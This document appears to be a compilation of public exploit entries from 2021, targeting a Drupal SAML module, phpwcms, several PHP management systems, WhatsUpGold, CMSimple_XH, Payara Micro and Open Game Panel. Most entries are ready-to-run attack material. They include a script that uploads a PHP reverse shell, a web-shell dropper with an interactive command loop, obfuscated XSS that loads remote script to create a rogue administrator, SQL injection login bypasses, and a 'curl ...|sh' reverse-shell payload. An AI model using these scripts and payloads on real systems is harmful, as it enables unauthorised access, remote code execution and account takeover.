ISHACK AI BOT

# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping # Date: 09/07/2021 # Exploit Author: Cristian 'void' Giustini # Vendor Homepage: https://www.miniorange.com/ # Software Link: https://www.drupal.org/project/miniorange_saml # Version: 8.x-2.22 (REQUIRED) # Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38) # Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/ # Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036 --- The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML Signature Wrapping Attacks that could allows an attacker to perform privilege escalation attacks. In order to exploit the vulnerability, the plugin must be configured with the "Either SAML reponse or SAML assertion must be signed" options enabled and an empty "x509 certificate". Administrator point of view: - Install a Drupal version (for the PoC the version 9.1.10 has been used) - Configure an external SSO system like Auth0 - Configure the plugin with the Auth0 provider by checking the "Either SAML response or SAML assertion must be signed" and empty "x509 certificate" Attacker point of view: - Register a normal user on the website - Perform a login - Intercept the request with Burp Suite and decode the SAMLResponse parameter - Inject an additional <Saml:Assertion> object before the original one (example here: https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml) (SAMLRaider Burp extension, XSW3 payload) <saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0" xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"> <saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID> <saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer"> <saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/> </saml:SubjectConfirmation> </saml:Subject> <saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z"> <saml:AudienceRestriction> <saml:Audience>http://localhost:8080</saml:Audience> </saml:AudienceRestriction> </saml:Conditions> <saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_"> <saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef> </saml:AuthnContext> </saml:AuthnStatement> <saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">[email protected]</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue> </saml:Attribute> <saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri"> <saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue> </saml:Attribute> </saml:AttributeStatement> </saml:Assertion> - Replace the username with one with higher privileges (like admin) - Submit the request - Successful exploitation

# Exploit Title: Phpwcms 1.9.30 - Arbitrary File Upload # Date: 30/9/2021 # Exploit Author: Okan Kurtulus | okankurtulus.com.tr # Software Link: http://www.phpwcms.org/ # Version: 1.9.30 # Tested on: Ubuntu 16.04 Steps: 1-) You need to login to the system. http://target.com/phpwcms/login.php 2-) Creating payload with SVG extension: payload.svg <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" /> <script type="text/javascript"> alert("XSS!"); </script> </svg> 3-) Go to the following link and upload the payload: http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8 From the menu: file -> multiple file upload -> Select files or drop here 4-) After uploading payload, call it from the link below. http://192.168.1.112/phpwcms/upload/

# Exploit Title: Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 30.09.2021 # Exploit Author: Fikrat Ghuliev (Ghuliev) # Vendor Homepage: https://www.sourcecodester.com/php/14972/vehicle-service-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14972&title=Vehicle+Service+Management+System+in+PHP+Free+Source+Code # Version: 1.0 # Tested on: Ubuntu import requests from bs4 import BeautifulSoup import sys import random import string import time print(""" [+] Vehicle Service Management System [!] Auth bypass + shell upload = RCE """) time.sleep(2) if len(sys.argv) != 4: print("[~] Usage : python3 exploit.py localhost ip port") exit() site = sys.argv[1] ip = sys.argv[2] port = sys.argv[3] shellcode = "<?php $sock=fsockopen('" +ip+"',"+port+");exec('/bin/sh -i <&3 >&3 2>&3'); ?>" letters = string.ascii_lowercase name = ''.join(random.choice(letters) for i in range(5)) def LoginAndShellUpload(): print("[+] Try Login") time.sleep(1) login = 'http://'+site+'/vehicle_service/admin/login.php' session = requests.session() post_data = {"username": "' OR 1=1-- -", "password": "aa"} user_login = session.post(login, data=post_data) cookie = session.cookies.get_dict() print('[+]Success login') print('[+]Try Shell upload') time.sleep(2) #shell upload url = 'http://'+site+'/vehicle_service/classes/SystemSettings.php?f=update_settings' cookies = cookie headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:92.0) Gecko/20100101 Firefox/92.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------34590800438205826044276614708", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/church_management/admin/?page=system_info", "Sec-Fetch-Dest": "empty", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Site": "same-origin"} data = "-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nVehicle Service Management System\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nVSMS - PHP\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"about_us\"\r\n\r\n<p style=\"text-align: center; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; padding: 0px; font-family: DauphinPlain; font-size: 70px; line-height: 90px;\">About Us</p><hr style=\"margin: 0px; padding: 0px; clear: both; border-top: 0px; height: 1px; background-image: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.75), rgba(0, 0, 0, 0));\"><div id=\"Content\" style=\"margin: 0px; padding: 0px; position: relative;\"><div id=\"bannerL\" style=\"margin: 0px 0px 0px -160px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: left; text-align: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div id=\"bannerR\" style=\"margin: 0px -160px 0px 0px; padding: 0px; position: sticky; top: 20px; width: 160px; height: 10px; float: right; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; background-color: rgb(255, 255, 255);\"></div><div class=\"boxed\" style=\"margin: 10px 28.7969px; padding: 0px; clear: both; color: rgb(0, 0, 0); font-family: \"Open Sans\", Arial, sans-serif; font-size: 14px; text-align: center; background-color: rgb(255, 255, 255);\"><div id=\"lipsum\" style=\"margin: 0px; padding: 0px; text-align: justify;\"></div></div></div><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nullam non ultrices tortor. Sed at ligula non lectus tempor bibendum a nec ante. Maecenas iaculis vitae nisi eu dictum. Duis sit amet enim arcu. Etiam blandit vulputate magna, non lobortis velit pharetra vel. Morbi sollicitudin lorem sed augue suscipit, eu commodo tortor vulputate. Interdum et malesuada fames ac ante ipsum primis in faucibus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Praesent eleifend interdum est, at gravida erat molestie in. Vestibulum et consectetur dui, ac luctus arcu. Curabitur et viverra elit. Cras ac eleifend ipsum, ac suscipit leo. Vivamus porttitor ac risus eu ultricies. Morbi malesuada mi vel luctus sagittis. Ut vestibulum porttitor est, id rutrum libero. Mauris at lacus vehicula, aliquam purus quis, pharetra lorem.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Proin consectetur massa ut quam molestie porta. Donec sit amet ligula odio. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Morbi ex sapien, pulvinar ac arcu at, luctus scelerisque nibh. In dolor velit, pellentesque eu blandit a, mollis ac neque. Fusce tortor lectus, aliquam et eleifend id, aliquet ut libero. Nunc scelerisque vulputate turpis quis volutpat. Vivamus malesuada sem in dapibus aliquam. Vestibulum imperdiet, nulla vitae pharetra pretium, magna felis placerat libero, quis tincidunt felis diam nec nisi. Sed scelerisque ullamcorper cursus. Suspendisse posuere, velit nec rhoncus cursus, urna sapien consectetur est, et lacinia odio leo nec massa. Nam vitae nunc vitae tortor vestibulum consequat ac quis risus. Sed finibus pharetra orci, id vehicula tellus eleifend sit amet.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Morbi id ante vel velit mollis egestas. Suspendisse pretium sem urna, vitae placerat turpis cursus faucibus. Ut dignissim molestie blandit. Phasellus pulvinar, eros id ultricies mollis, lectus velit viverra mi, at venenatis velit purus id nisi. Duis eu massa lorem. Curabitur sed nibh felis. Donec faucibus, nulla at faucibus blandit, mi justo efficitur dui, non mattis nisl purus non lacus. Maecenas vel congue tellus, in convallis nisi. Curabitur faucibus interdum massa, eu facilisis ligula pretium quis. Nunc eleifend orci nec volutpat tincidunt.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Ut et urna sapien. Nulla lacinia sagittis felis id cursus. Etiam eget lacus quis enim aliquet dignissim. Nulla vel elit ultrices, venenatis quam sed, rutrum magna. Pellentesque ultricies non lorem hendrerit vestibulum. Maecenas lacinia pharetra nisi, at pharetra nunc placerat nec. Maecenas luctus dolor in leo malesuada, vel aliquet metus sollicitudin. Curabitur sed pellentesque sem, in tincidunt mi. Aliquam sodales aliquam felis, eget tristique felis dictum at. Proin leo nisi, malesuada vel ex eu, dictum pellentesque mauris. Quisque sit amet varius augue.</p><p style=\"margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px;\">Sed quis imperdiet est. Donec lobortis tortor id neque tempus, vel faucibus lorem mollis. Fusce ut sollicitudin risus. Aliquam iaculis tristique nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae nisi. Curabitur at quam ut libero convallis mattis vel eget mauris. Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum non magna at, molestie gravida magna. Aenean neque sapien, volutpat a ullamcorper nec, iaculis quis est.</p>\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+name+".php\"\r\nContent-Type: application/x-php\r\n\r\n"+shellcode+"\n\n\r\n-----------------------------38784447663334447953661330489\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n-----------------------------38784447663334447953661330489--\r\n" requests.post(url, headers=headers, cookies=cookies, data=data) print('[+]Success!') print('[+]Getting reverse shell') time.sleep(2) def RCE(): path = 'http://'+site+'/vehicle_service/uploads/' html_text = requests.get(path).text soup = BeautifulSoup(html_text, 'html.parser') for link in soup.find_all('a'): data = link.get('href') if ".php" in data: r = requests.get('http://'+site+'/vehicle_service/uploads/'+data) print('[+]Pwned!') LoginAndShellUpload() RCE()

# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-09-30 # Exploit Author: sanjay singh # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dfsms/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 57 Origin: http://localhost Connection: close Referer: http://localhost/dfsms/index.php Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=dfsms&login=

# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass # Date: 2021-10-01 # Exploit Author: SUDONINJA # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/ # Version: v1.0 # Tested on: Windows 10 Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/dfsms/index.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step 4 – Change the username to admin' or '1'='1 and password to dfsms Step 5 – Click forward and now you will be logged in as admin. POC POST /dms/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 83 Origin: http://localhost Connection: close Referer: http://localhost/dms/admin/ Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl Upgrade-Insecure-Requests: 1 username=admin%27+or+%271%27%3D%271&password=admin%27+or+%271%27%3D%271&login=login

# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) # Date: 09.17.2021 # Exploit Author: Andreas Finstad (4ndr34z) # Vendor Homepage: https://www.whatsupgold.com # Version: v.21.0.3, Build 188 # Tested on: Windows 2019 Server # CVE : CVE-2021-41318 # Reference: https://f20.be/cves/poc-cve-2021-41318 Description: Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks. Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation. No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS. SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload: # snmpd.conf # An example configuration file for configuring the Net-SNMP agent ('snmpd') # See snmpd.conf(5) man page for details ############################################################################ # SECTION: System Information Setup # syslocation: The [typically physical] location of the system. # Note that setting this value here means that when trying to # perform an snmp SET operation to the sysLocation.0 variable will make # the agent return the "notWritable" error code. IE, including # this token in the snmpd.conf file will disable write access to # the variable. # arguments: location_string sysName Evil-Device sysLocation Somewhere Over The Rainbow sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))> This is the base64 encoded string: var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a); x.js: var vhost = window.location.protocol+'\/\/'+window.location.host var username = "sysadmin" var password = "me" fetch(vhost+'/NmConsole/api/core/WebUser',{ method: 'POST', headers: { 'Content-Length': '479', 'Accept': 'application/json', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51', 'Content-Type': 'application/json', 'Origin': vhost, 'Referer': vhost+'/NmConsole/', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4', 'Connection': 'close' }, credentials: 'include', body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}' });

# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) # Date: 01-10-2021 # Exploit Author: Halit AKAYDIN (hLtAkydn) # Vendor Homepage: https://www.cmsimple-xh.org/ # Software Link: https://www.cmsimple-xh.org/?Downloads # Version: 1.7.4 # Category: Webapps # Tested on: Linux/Windows # CMSimple_XH is an open source project under GPL3 license # Includes an endpoint that allows remote access # Backup page is misconfigured, causing security vulnerability # User information with sufficient permissions is required. # Example: python3 exploit.py -u http://example.com -p Admin123 from bs4 import BeautifulSoup from time import sleep import requests import argparse def main(): parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)') parser.add_argument('-u', '--host', type=str, required=True) parser.add_argument('-p', '--password', type=str, required=True) args = parser.parse_args() print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)", "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n") host(args) def host(args): #Check http or https if args.host.startswith(('http://', 'https://')): print("[?] Check Url...\n") sleep(2) args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass else: print("\n[?] Check Adress...\n") sleep(2) args.host = "http://" + args.host args.host = args.host if args.host.endswith('/'): args.host = args.host[:-1] else: pass # Check Host Status try: response = requests.get(args.host) if response.status_code == 200: login(args) else: print("[-] Address not reachable!") sleep(2) except requests.ConnectionError as exception: print("[-] Address not reachable!") sleep(2) exit(1) def login(args): url = args.host + "/?&login" cookies = { "XH_2f": "evil" } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&login" } data = { "login": "true", "keycut": args.password, "submit": "Login" } response = requests.post(url, headers=headers, cookies=cookies, data=data) token = response.cookies.get("XH_2f") soup = BeautifulSoup(response.text, 'html.parser') if (soup.find("link",{"rel":"next"})['href'] != "/"): print("[!] Login Success!\n") sleep(2) csrf(args,token) else: print("[!] Wrong password!!\n") sleep(2) def csrf(args, token): url = args.host + "/?file=content" cookies = { "status": "adm", "XH_2f": token } headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?&settings", "Accept-Encoding": "gzip, deflate", "Connection": "close" } response = requests.get(url, headers=headers, cookies=cookies) try: soup = BeautifulSoup(response.text, 'html.parser') csrf = soup.find_all("input", type="hidden")[3].get("value") create(args, token, csrf) except Exception as e: print(e) else: pass def create(args, token, csrf): payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n" url = args.host cookies = { "status": "adm", "XH_2f": token } headers = { "Origin": args.host, "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": args.host + "/?file=content&action=edit&xh_success=content", "Accept-Encoding": "gzip, deflate" } data = { "text": payload, "file": "content", "action": "save", "xh_csrf_token": csrf } response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True) if (response.status_code == 200): print("[!] Create Vuln File!\n") sleep(2) exploit(args) else: print("[!] Create Failed!\n") sleep(2) def exploit(args): print("[+] Exploit Done!\n") sleep(2) while True: cmd = input("$ ") url = args.host + "/evil.php?cmd=" + cmd headers = { "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0" } response = requests.post(url, headers=headers, timeout=5) if response.text == "": print(cmd + ": command not found\n") else: print(response.text) if __name__ == '__main__': main()

# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal # Date: 01/10/2021 # Exploit Author: Yasser Khan (N3T_hunt3r) # Vendor Homepage: https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html # Software Link: https://www.payara.fish/downloads/payara-platform-community-edition/#x # Version: Payara Micro Community 5.2021.6 # Tested on: Linux/Windows OS # CVE : CVE-2021-41381 https://nvd.nist.gov/vuln/detail/CVE-2021-41381 Proof of Concept: Step1: Open the browser check the version of the payara software Step2: Add this Path at end of the URL /.//WEB-INF/classes/META-INF/microprofile-config.properties Step3: Check the response with match containing "payara.security.openid.default.providerURI=" "payara.security.openid.sessionScopedConfiguration=true" Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability. Step5: Alternatively we can use CURL by using this command: Request: curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/microprofile-config.properties Reference: https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt https://docs.payara.fish/community/docs/release-notes/release-notes-2021-6.html https://nvd.nist.gov/vuln/detail/CVE-2021-41381

# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated) # Google Dork: intext:"Open Game Panel 2021" # Date: 08/14/2021 # Exploit Author: prey # Vendor Homepage: https://www.opengamepanel.org/ # Software Link: https://github.com/OpenGamePanel/OGP-Website # Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits) # Tested on: CentOS Linux 5.4.102 #Before the patch, it was possible to inject system commands on "map" parameter when launching a new counter-strike server just by putting the command= betwen ';', the user needs to be authenticated for this. import requests banner = """ @ @ @@& @@@@@/ @ @& #@@@@@& .= ,/%@# @ @@@@@@@@@@@@@((%@@@@* @ #@@@@@@@@@@@@@@@*%@, @ @@@@@@@@@@@@@@&@@@@ @ &@@@@@@@@@/ &@@@. @ @@@@@@@@@( @ @@@@@@@@@@@@@&* @ &@@@@@@@@@@@@@@@@% @ ,&@@@@@@@@@@@@@ @ %@@@@@@@. @ .%@@@@@@@@% @@@@@@ @ @@@@@# .&@@@@# @ (@@@@@@@@@@@. .@@@& @@% @ .@@@@@, #@@@@@* #@@@ @@@@@ @ @@@& &@@@. @@@ @ ,@@@ @@@@@@ @ @@@ %@@@, @&@@ @@@, @@@@ @@@@ *@@@@@# @@ *@@ %@ @@@ @@ @@@@@/ @@@ @@@ ,@@@ ,@( .@= % *@/ @@ .@/ @(@ @@ @@@( @@ ,@( @@@* @#@@ @@(@ ,@( .@= % *@@@@@@ @@ @ &&.@( @@ @.@@ @@@@ @@.@(@ @@ (@. @@ ,@( .@= % *@/ %@(@ @@@ @@ *@@@ @@ @@ @@. @@ @@@@@@, ,@( .@= % *@/ @@* @@@ @@ %@@ @@@@@* @@ @@ &@ @@ ,@@@@@ .@= @@@@ ##You can get mod_id and home_id on your game panel URL when you are logged """ print(banner) target = input("Target url: (eg: https://panel.example.org)\n") opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n") mod_id = input("Mod_id value: (eg: 2437)\n") home_id = input("Home_id value: (eg: 3737)\n") server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n") command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n") url = target + "/home.php?m=gamemanager&p=game_monitor" cookies = {"opengamepanel_web": opengamepanel_web} headers = {"Content-Type": "application/x-www-form-urlencoded"} data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"} try: requests.post(url, headers=headers, cookies=cookies, data=data) except: print("Something went wrong, check your inputs or try manually exploiting the map parameter") print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")

# Exploit Title: Lodging Reservation Management System 1.0 - Authentication Bypass # Date: 2021-09-20 # Exploit Author: Nitin Sharma(vidvansh) # Vendor Homepage: https://www.sourcecodester.com/php/14883/lodging-reservation-management-system-php-free-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14883&title=Lodging+Reservation+Management+System+in+PHP+FREE+Source+Code # Version: v1.0 # Tested on: Windows 10 - XAMPP Server # Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts. #Steps-To-Reproduce: Step 1 Go to the Product admin panel http://localhost/lodge/admin/login.php. Step 2 – Enter anything in username and password Step 3 – Click on Login and capture the request in the burp suite Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -. Step 5 – Click forward and now you will be logged in as admin. # PoC: POST /lodge/classes/Login.php?f=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: */* Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 49 Origin: http://localhost Connection: close Referer: http://localhost/lodge/admin/login.php Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin username=+'+or+1%3D1+--+&password=+'+or+1%3D1+--+ # Authentication Bypass: # Go to admin login page 